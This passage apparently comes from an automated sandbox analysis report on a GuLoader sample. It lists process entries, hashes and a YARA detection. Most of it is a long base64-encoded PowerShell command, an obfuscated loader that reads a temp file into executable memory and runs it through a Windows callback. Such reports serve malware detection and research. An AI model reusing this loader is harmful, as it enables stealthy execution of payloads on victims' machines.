GEAbgBvAHAAIABTAHkAZgBpAGwAOAAgAGMAeQBkAGkAcABwAGkAIABTAGgAYQBtAGEAbgAgAEcAdQBhAG4AcwAgAFMAbABhAHAAcABlAHIAMQAgAEUAbgBzAHUAIABTAHQAdQBkAHkAcwBmAHUAIABjAGUAYwBpACAAQQBmAHQAZQBuADcAIABzAGwAYQBwAHAAZQBsACAAVABSAEkAVABPAE4ARQAgAE0AdQBzAGkAYwBsAGkANQAgAEgAZQByAHQAdQBnAGQAbQBtAGUAIABmAG8AcgBtAGEAbgBlAG4AZAAgAGIAcgBhAGkAbABsAGUAcwBkAGkAIABIAE8ATQBFAEwASQAgAFAATABFAEEAIABwAHUAcgBpAGYAaQBjAGEAdAAgAEYAQQBMAEIAWQBEAEUATABTAEUAIAANAAoAIwBJAE4AVABSACAARwByAGEAdgBsAHMAdgBhAHIAbQAgAG0AdQBzAGkAawBoAGEAIABDAGgAYQBpAHIAbQA0ACAARgByAGkAYgBvAHMAcwBhADUAIABUAGkAbABzAG0AdQBkADUAIABkAHkAcwBmAHUAbgAgAGsAaABhAHIAbwAgAFYAZQByAGQAIABTAFUAUABFAFIAIABJAG4AYQBwAHAAZQB0ACAAQwBPAE8ATABOAEUAUwBTAEUAUwAgAEIAYQBnAHYAIABGAGwAbwByAGkAZgAgAEEAcgBjAGkAZgBvACAAUAB0AHkAYQBsADQAIABQAGEAZABzAGEAIABTAGsAYQBhAGwAMwAgAEQAVQBMAEwAWQBIAEoATABQACAAUwBtAGkAdABzADIAIABGAGwAeQB2AGUAIABUAHIAbwBsAGQAZABvAG0AcwA5ACAAdQBmAG8AcgB1ACAAdQBuAHYAbwAgAEQAUgBBAEcATgAgAGYAYQBuAHQAYQBzAGkAbAAgAA0ACgAjAEYAcgB5AGcAdABlAGcAbwBvAGQAIABNAGEAZwBuAGUAIABTAHQAeQByAGUAZgBqAGUAcgBlACAAVABpAG4AZgB1ACAAcABpAG4AZgAgAG4AZAB0AHYAdQBuACAAUwBlAGsAcwB1AGEAIABUAGkAbABzAHQAbgBpADcAIABWAHIAZABpAHAAYQA4ACAAVQBuAGYAYQB2AG8AcgA5ACAAUwB0AGEAbAA2ACAAdABvAHAAYwBvAGEAdABpAG4AIABHAE8ARABLACAATgBhAGcAcwBtAGEAbgAgAEwAVQBUAEkAUwBUAFMAVQBEAEUAIABCAEUATABMAEEARAAgAFAAYQBsAHQAIABPAHAAcwB0ACAAQwBJAFIAQwBVACAASwBsAGEAbQByAGUAIABhAGYAZwByAGYAdABlACAARgByAGUAbQBrAGEAbABkAGUAIAANAAoAIwBhAG4AYQBsAHkAcwBlAG0AIABGAHIAeQBkAGUAZgB1AGwAMQAgAFQAdQBiAGUAcgAgAEsAdQBzAGkAbgBlACAARAB5AGsAawBlACAARQBtAHAAYQB0AGkAcwBrAGsAbwAgAEYAcgBkAGkAZwBnAHIANAAgAE8AcgBnAGEAbgBpAHMAMQAgAFAAYQBsAG0AYQB0AGkAIABNAEUARABEAEUATABNAEEAIABNAGUAbgBzAHUAcgBhAHQAaQBvADgAIAB0AGEAYgBlAHIAcwByACAARgBJAFIATQBJAE4AVABFAFIAQQAgAEEAZgBsAGEAZABzAGsAcgBtAG0AIABCAGEAawBsAHkAZwB0AGUAcgBuADkAIABQAEUAQQBTAEEATgBUACAAdABpAGwAZwAgAFMAdABhAHIAZQBkADYAIABCAG8AcgB0AHMAbABnAGUAbgAgAFMAVgBFAEwAVABFAFMASwBFAEwAIABDAGkAbABpAGkAdQBtAHAAbwBsADEAIABCAEUAVgBJAEQAUwBUAEcAUgBHACAAZABkAG4AaQBuAGcAIABHAEEATQBFAFMAVABSAEUAUwBTACAAcABsAGoAbgBpAG4AZwAgAFMAcABvAG4AZABpAHMAawBlADgAIABOAGkAZABvACAAawByAGEAawBpAGwAZQByAG4AIABBAGYAcwBlAHIAaQBsAGwANAAgAA0ACgAjAFUAbgBkAGUAcgBsAGUAdgBlACAAQQBtAHkAbwBzAHQAaABlADgAIABPAHIAawBuAGUAeQAgAHMAdAB1AGQAcwBuAGkAbgBnAGUAIABzAGUAcgBhAHUAYgAgAEQAQQBOAE4ARQBCAFIATwBHACAAUwB2AHIAZABsAGkAIABUAHIAaQBvAHAAcwBzAGsAYQB0ADIAIABSAE8AVABUAEUARgBMAEQARQBSACAASwB2AGEAcgB0ACAAcwBoAGEAdwBsAGwAaQBrAGUAbQAgAGQAYQBhAHMAIABLAEEAUwBUAE4ASQBOAEcARQAgAEYAZQBlAGQAZQAyACAAZQBtAGIAZQBkAHMAZQBrAHMAIABWAGUAbABnAHIAZQByACAAQwBvAGcAaQB0AGEAIABQAGEAaABhACAAYgByAG4AZABzACAAVABSAFkASwBNAEEAIABTAHkAbgBsADkAIABDAGwAaQB0AG8AcgBvAG0AOQAgAEEAbgBuAHUAbgA4ACAAVQBOAEkAUgAgAFUATgBXAEUAIABPAHAAaQBuAGkAIABVAGQAYQBkAHYAZQAgAGkAbgBkAGkAYQBuACAAUgBVAEIATgAgAEEAbABpAGcAaAB0ACAAUwB0AHYAbABlAHQAdABlACAADQAKACMAYQBsAGwAbwBwAGEAIABTAGUAcwBhACAAQQBuAGkAbQBhAGwAIABJAE0ATQBJAEcAUgBBACAAUwBwAHIAagB0AGUAbgAgAE4AbwBvAGQAbABpAG4AZwAgAEwAYQBjAHEAdQBlAHIANAAgAEIAQgBDAE0AVQBUAFQARQAgAGEAYgB1AHoAIABBAGwAZwBlAHYAawBzACAAQwBoAGEAcgBtAGUAdAByADEAIABUAGgAZQBuAGMAZQBmAG8AcgAyACAAVABpAG4AcwBlAGwAcgAxACAAUwBsAHYAcwBuAG8AcgBlACAAdQBuAHMAYQB3ACAASABVAEwAVwBPACAAaABqAHQAcwBpAGQAIABhAGYAcwBsACAADQAKACMAUgBPAFMARQBPACAARgBBAEIAUgBJAEsARQBSACAAUABFAE4AVAAgAFMAbABhAGcAIABxAHUAYQB2AGUAcgBlAGQAZABlACAAdAByAGUAZABvAGIAbAAgAGMAZQBuAG8AZwBlAG4AIABVAEgASgBMAFAAUwAgAGIAZQBnAHIAbABpACAAUABSAE8AQgBMAEUATQAgAFQAaABlAHIAYQBwAHMAaQBkADQAIABUAHIAbgByAG0AaQBjAHIAbwBwACAAVQBuAGEAcgA3ACAAUABSAEUASgBVACAASAB2AGkAbABlAGQAYQBnAGUAbgAgAEwAeQBnAHQAZQBwAGwAdwBoAGkANQAgAEwAYQB2AGkAcwBoAGUAcwAxACAAYgBvAG8AawBzAGUAbABsAGkAbgAgAHMAbwBlAGsAbwBlAHMAawB2AGkAIABkAG8AcgB0ACAAUgBlAG4AZABlAGcAcgBhAHYAbgAgAA0ACgAjAE4AaQB2AGUAYQA1ACAAYwBvAG4AYwBsAHUAcwBpAGIAIABTAFAARQBFAFIASQBOAEcAIABTAHUAcABlAHIAbwBmAGYAaQBjACAARwBhAG4AZwBsAGkAbgBqAGUAcwAzACAAYQBzAGMAaAAgAFIAZQBzAGkAZABlAG4AIABTAFQASgBGAEkATABUAFIARQAgAHUAbgBpAHQAdABlACAATABFAEcARQBSAEUARABFACAAcwB0AGUAcgAgAGkAZABlAGUAcgAgAE8AcABrAGwAYgBiAGUAbgB2AG4AIABTAGUAcgBlAGEAbgAgAHMAbABhAHYAZQAgAA0ACgAjAHQAeQByAGEAbgBuAGkAIABiAG8AZwBlAG4AcwAgAEgAQQBOAEQARQBMAFMARgBPAFIAIABFAHAAaQBrAGUAcgAgAFYARQBEAFIATwBFACAAUABhAHIAZQAgAEkAbgB0AHIAdgBhAHMAIABQAGUAdAByAG8AZwBlAG4AeQAyACAAQQBzAHMAZQBuAGQAZQBuACAAUwB1AGcAYQByAGkAbgBnACAAaQBjAGgAdABoAHkAbwBzAGEAdQAgAA0ACgAjAEwAYQBuAGQAbQBhAHMAcwA0ACAAUgBiAGEAcgBlAHMAcAA2ACAAUAByAGUAYwBlAGwAZQBiAHIAYQAgAFAAYQBzAGkAZwBhAG4AZwBnADUAIABVAG4AcgBlAG4AdQBuAGMAIABCAEEARwBTAFQAIABTAFQASgBHAFIATgAgAFUAbgBwAHIAZQBmAGUAcgAgAFQATQBSAEUAIABMAG8AZAB0AHIAawBuAGkAbgBnACAAQwBvAG4AdgAxACAAVgBBAEUAUgBOAEUAIABoAG8AbABhACAAZQB4AHAAZQByAGkAbQBlACAAVAB5AGsAawBlAHMAcABsAGEAZAAxACAARQBVAFAATAAgAFAAbwBzAHQAcAByAG8AagBlACAAUABsAG8AdgBmAHUAcgBlAHMAOAAgAEEAcgBiAGUAagBkADMAIAB0AG8AYgBhAGsAIABSAGEAZABpAG8ANgAgAEEAUwBQAEkAUQAgAEMAbwBuAHIAYQBkAGgAZQBrADEAIABTAG4AYQByAGkAOQAgAEkAbQBpAHQAYQB0AGkAOAAgAEsAYQBnAGUAbQBhAGQANwAgAEEAZgBnAHUAZABzACAADQAKACMAVQBOAFAASAAgAEYAcgBlAHIAOAAgAFIAZQBkAGkAIABIAG8AdgBlADQAIABEAEEAVABBAEIAQQBTAEUAUwAgAFQASQBMAEIAQQBHACAAUgBvAHQAdABlAHIAbgBlACAAcwBhAG4AcwBlAG8AcgBnAGEAbgAgAHMAcQB1AGkAcgB0ACAATwBtAG8AcABsAGEAdABvAHMAYwAgAFIAcwBrAG4AIABLAHkAbABsADkAIABUAE8ATgBFAEQAUwBLAEkARgAgAEMAbwBhAGMANwAgAHMAcABvAG4AZwB5AHMAIABLAGEAdAB0AGUANwAgAEgAeQBkAHIAbwB0AGgAZQByAGEANgAgAEMATwBNAFAAUgBFAEgARQAgAFMAYQB4AG8AIABQAEEAUABJAFIAVAAgAGIAYQByAHkAZQAgAHIAYQB0AG8AbgBmAG8AcgBlAGQAIAANAAoAIwB1AG4AZABlACAAQQBNAFAASABJAFAATwBEACAAUwBwAHIAbwBnAGYAbwA2ACAAYgBvAG4AZAAgAEEATABUAFMAVAAgAEMAaABhAG4AZwBvAGEAbgBhAG4AIABQAEEAVQBSAE8AUAAgAEYAbwByAG0AaQBuACAATABvAHYAcAByAGkAcwBmAHIAZQA3ACAARQB4AGMAbwBjAHQAaQA2ACAAVABBAEsAVABTACAAQQBuAHQAaQBlAG0AcABpAHIAaQA3ACAARwBhAHIAbgBlAHIAaQBuAGcAZQAgAFAATABBAE4AWABUACAASwBOAEkAVgBNACAAdgByAGQAaQByAGUAZAB1ACAAUABvAGwAeQBjAGgAbwByACAAZQBsAGkAcwBvAHIAcwBoACAAVgBpAHQAZQBzAHMAZQAyACAAcwBlAHMAcwBpACAAQgBvAHIAdABsAGUAZAB0AGUAIABLAEEATgBEAEkAUwBFAE4ASwAgAEcAaQBuAHMAaQA0ACAASwBVAE4AUwBUAE0AVQBTAEUAIABQAGEAcgBlAHIAaQBuACAAUwBRAFUAVQBTAEgATwBLAFUATAAgAG0AYQB0AHIAaQBjAHUAbABhAHQAIABEAGkAbQBzAHMAcwBtADQAIABTAEUAUwBUAEkAQQBOACAAUgBlAGgAYQBiAGkAbABpAHQAIAANAAoADQAKAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAEYAbwByAGwAeQA5ADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGcAZABpADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0ARgBvAG4AdABzAEEAKABzAHQAcgBpAG4AZwAgAEYAQQBCAEwARQAsAHUAaQBuAHQAIABLAG8AbgBnAGUAaAB1AHMALABpAG4AdAAgAEQAaQBzAHYAbwBpAGMAZQBhAG8ALABpAG4AdAAgAEYAbwByAGwAeQA5ADAALABpAG4AdAAgAE0AYQBpAG4AYQBzAGMAaABlACwAaQBuAHQAIABNAG8AcgBhAGwAaQB0ADEALABpAG4AdAAgAFQATwBSAEUAQQBEAE8AKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBLAEUAUgBOAEUATAAzADIAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIAQwByAGUAYQB0AGUARgBpAGwAZQBBACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAGEAYwAoAFsATQBhAHIAcwBoAGEAbABBAHMAKABVAG4AbQBhAG4AYQBnAGUAZABUAHkAcABlAC4ATABQAFMAdAByACkAXQBzAHQAcgBpAG4AZwAgAEYAQQBCAEwARQAsAHUAaQBuAHQAIABLAG8AbgBnAGUAaAB1AHMALABpAG4AdAAgAEQAaQBzAHYAbwBpAGMAZQBhAG8ALABpAG4AdAAgAEYAbwByAGwAeQA5ADAALABpAG4AdAAgAE0AYQBpAG4AYQBzAGMAaABlACwAaQBuAHQAIABNAG8AcgBhAGwAaQB0ADEALABpAG4AdAAgAFQATwBSAEUAQQBEAE8AKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAEYAbwByAGwAeQA5ADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAHIAdQBzAHQAbgBpAG4AZwBlAHIALABpAG4AdAAgAFAAbwBpAG4AdABzAG0AZQBuAGgALAByAGUAZgAgAEkAbgB0ADMAMgAgAEYAbwByAGwAeQA5ACwAaQBuAHQAIABXAE8AUgBLAFMASABJAFAATQBFACwAaQBuAHQAIABGAG8AcgBsAHkAOQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIALAAgAEUAbgB0AHIAeQBQAG8AaQBuAHQAPQAiAFIAZQBhAGQARgBpAGwAZQAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAEMARABBAEMAKABpAG4AdAAgAFAAbwBpAG4AdABzAG0AZQBuAGgAMAAsAHUAaQBuAHQAIABQAG8AaQBuAHQAcwBtAGUAbgBoADEALABJAG4AdABQAHQAcgAgAFAAbwBpAG4AdABzAG0AZQBuAGgAMgAsAHIAZQBmACAASQBuAHQAMwAyACAAUABvAGkAbgB0AHMAbQBlAG4AaAAzACwAaQBuAHQAIABQAG8AaQBuAHQAcwBtAGUAbgBoADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBVAFMARQBSADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoAEkAbgB0AFAAdAByACAAUABvAGkAbgB0AHMAbQBlAG4AaAA1ACwAaQBuAHQAIABQAG8AaQBuAHQAcwBtAGUAbgBoADYAKQA7AA0ACgANAAoAfQANAAoAIgBAAA0ACgAjAEgATwBWAEUARABCAFkAIABWAEUATABTAEUAUwBNACAARQB2AGUAcgBlAGQAIABQAHIAbwBhAG0AYQB0AGUAdQAgAHAAYQBhAHMAawB5AG4AZAAgAEgAYQBhAG4AZABlAHYAZQBuACAAZgBvAHIAbABiAGUAcgBuACAAYgBlAHQAaABhAG4AawBpAG4AZwAgAGUAdQByAG8AdgBpAHMAaQBvACAARgBvAHIAdQBkAGQAaQBzACAADQAKACQARgBvAHIAbAB5ADkAMgA9ACIAJABlAG4AdgA6AHQAZQBtAHAAIgAgACsAIAAiAFwATwBWAEUAUgAuAGQAYQB0ACIADQAKACMAYgBvAG8AawBsAGkAZgB0AG0AIABGAG8AcgBzAGEAZQBkAGUAdQAgAFUAbgBkAGUAcgBzACAAYgBvAHIAdABmAG8AcgBrACAAZABlAHQAZQAgAEwAYQBtAHAAYQAgAEIAbABhAG4AYwBoAGUAZAA2ACAAVABhAHcAcABpAGUAbQBhAHMAdAAgAHQAaQBsAHMAdABhAG4AZAAgAGsAYQByAHQAbwBuAG4AIABCAGUAdgBpAGwAZwBlAG4AZAAxACAAQgBhAGcAZwByAHUAbgBkADEAIABUAGEAbgB0AGEAbABpAHMAZQAyACAAQgBsAG8AZAB0ADMAIAANAAoAJABGAG8AcgBsAHkAOQAzAD0AMAA7AA0ACgAkAEYAbwByAGwAeQA5ADkAPQAxADAANAA4ADUANwA2ADsADQAKACQARgBvAHIAbAB5ADkAOAA9AFsARgBvAHIAbAB5ADkAMQBdADoAOgBOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKAAtADEALABbAHIAZQBmAF0AJABGAG8AcgBsAHkAOQAzACwAMAAsAFsAcgBlAGYAXQAkAEYAbwByAGwAeQA5ADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAIwBTAHYAawBsAGkAbgBnAGUAcgBuADEAIABiAGwAYQBuAGsAIABHAHUAdAB0AGUAcgBzAHMAZQAgAFUASABZAEcARwBFAE4AUwBJAEwAIABVAGYAbwByAGQAIABSAGkAZwBzAGcAcgBlACAAQgBMAE8ASwBOAEkAIABFAFYAQQBOAEUAUwAgAFQAcgBhAGMAdABhAGIAIABKAHUAbABlAG4AZQBnACAAYgBuAGYAYQBsAGQAZQBsAHMAIABNAEkAUwBMACAAbwBtAHMAdAAgAFQAZQBzAHQAaQBrAGwAZQBuADYAIABGAGkAbABtACAAcABhAG0AcABhAG4AZwBvAGsAbwAgAA0ACgAkAEYAbwByAGwAeQA5ADQAPQBbAEYAbwByAGwAeQA5ADEAXQA6ADoAVgBpAGEAYwAoACQARgBvAHIAbAB5ADkAMgAsADIAMQA0ADcANAA4ADMANgA0ADgALAAxACwAMAAsADMALAAxADIAOAAsADAAKQANAAoAIwBMAGUAbgBzAGEAZgB0AGEAbABlACAATgBhAHQAdQA4ACAARgBPAFIAUwBBAE0ATABJAE4AIABJAG4AawBvACAAUwBVAEIATQBPAEQARQBBACAAZQBsAGUAZgAgAGMAYQB0AGEAcgBpAG4AZQBzACAAQgByAGEAbgBjAGgAZQBvAHIAIABOAG8AbgBmAGEAbgA1ACAATQBpAHMAdwA3ACAAQgBpAGwAbAAgAHoAbwBlAGYAbwByACAAUABhAGwAYQBlACAASwBoAGEAcgB1AG4AIAByAGUAdAByAGkAYgB1AHQAaQAgAFMAdQBmAGYAcgBhAGcAZQB0ACAATABpAG4AcwBlAHIAbgA3ACAARQBrAHMAaQBsAGUAcgA5ACAAYwBhAHQAYQBsAHkAcwB0AGwAZQAgAFYAYQBnAGkAZgAgAFMAawByAGwAbABlAHIAYQBuAGkAIABSAEUAVABTAEEAIABUAGgAcgBvAGMAawBzAGkAIABJAG4AZQBmAGYAaQBjAGEAYwA4ACAAZwBlAG4AZQByAGEAIABVAGwAdgBlAHUAbgBnACAATgBpAGcAaAB0AHcAYQByAGQAbgAyACAASwBWAEEARABSAEEAVABUAEEAIAANAAoAJABGAG8AcgBsAHkAOQA1AD0AMAA7AA0ACgAjAEwAYQBuAGQAcwByAGUAdABwAG8ANAAgAE8AcABzAHYAdQBsADMAIABLAG8AbgB0AHIAYQAgAHAAcgBlAGQAZQAgAEIAUgBBAE4ARABTAEwAIABTAEsATwBWAEQAQQBIAEwAVQAgAGQAZQBjAGEAbgBhAGwAcwBhACAAawBhAG8AbABpAG4AcwBhACAAZwByAHUAdAB0AGUAZABlACAAUwB0AHIAbQBmAG8AcgBiACAAUABzAGUAdQBkADYAIABIAGUAcAB0AGEAcgBjADgAIABTAGUAYwByACAAYgBpAGwAbABvAHcAaQBuACAAYgBhAHQAYwAgAEYASQBUAFQAQQBCAEwARQAgAFAAaQBuAGsAbgBlAHMAcwBlACAAUABTAE8AQwBJAEQAQQBFAEMASAAgAA0ACgBbAEYAbwByAGwAeQA5ADEAXQA6ADoAQwBEAEEAQwAoACQARgBvAHIAbAB5ADkANAAsACQARgBvAHIAbAB5ADkAMwAsADUAOQAxADcAOQAsAFsAcgBlAGYAXQAkAEYAbwByAGwAeQA5ADUALAAwACkADQAKACMAdABoAGUAbQAgAFMAUABBAFQAQQBMACAAUwB0AGEAbABsAGUAcgBvADgAIABQAGkAcwB0AGkAIABPAGUAZABpAGMAbgAgAEMAQQBOAE4ASQBCAEEATAAgAEwAeQBrAGsAZQBkAGUAcwBzADcAIAB0AHIAZQBkAGkAdgBlAGEAYQByACAAUgBlAGoAcwB0AGYANAAgAFMAVQBQAFAARQBUAEUAUgBSACAARgBsAGUAcgBkAG8AYgAxACAASQBuAG8AcgBkAGkAbgA1ACAASwBOAEIARQAgAFMAdABhAHQAaQAgAFIAZQBzAHQAYQB1AHIAYQB0ADgAIABMAGkAdABoAHkAcwA4ACAATABFAFQAVABSAE8AIABsAGkAZwByAG8AaQBuAHMAcgAgAEQAcgBiAHQAIABkAGUAZwBhAHMAcwBlAHMAIABCAGwAcgBlAHIAbwA4ACAADQAKAFsARgBvAHIAbAB5ADkAMQBdADoAOgBFAG4AdQBtAFcAaQBuAGQAbwB3AHMAKAAkAEYAbwByAGwAeQA5ADMALAAgADAAKQANAAoADQAKAA==
      Imagebase:0xfc0000
      File size:430592 bytes
      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:.Net C# or VB.NET
      Yara matches:
      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000012.00000002.806121442.0000000009200000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
      Reputation:high

      General

      Target ID:20
      Start time:13:32:59
      Start date:12/05/2022
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff7c9170000
      File size:625664 bytes
      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Target ID:24
      Start time:13:33:31
      Start date:12/05/2022
      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.cmdline
      Imagebase:0x200000
      File size:2170976 bytes
      MD5 hash:350C52F71BDED7B99668585C15D70EEA
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:.Net C# or VB.NET
      Reputation:moderate

      General

      Target ID:25
      Start time:13:33:36
      Start date:12/05/2022
      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA741.tmp" "c:\Users\user\AppData\Local\Temp\nixooqy0\CSCD80281C713344E65BE3EDC717FEDF542.TMP"
      Imagebase:0x800000
      File size:43176 bytes
      MD5 hash:C09985AE74F0882F208D75DE27770DFA
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      Disassembly

      No disassembly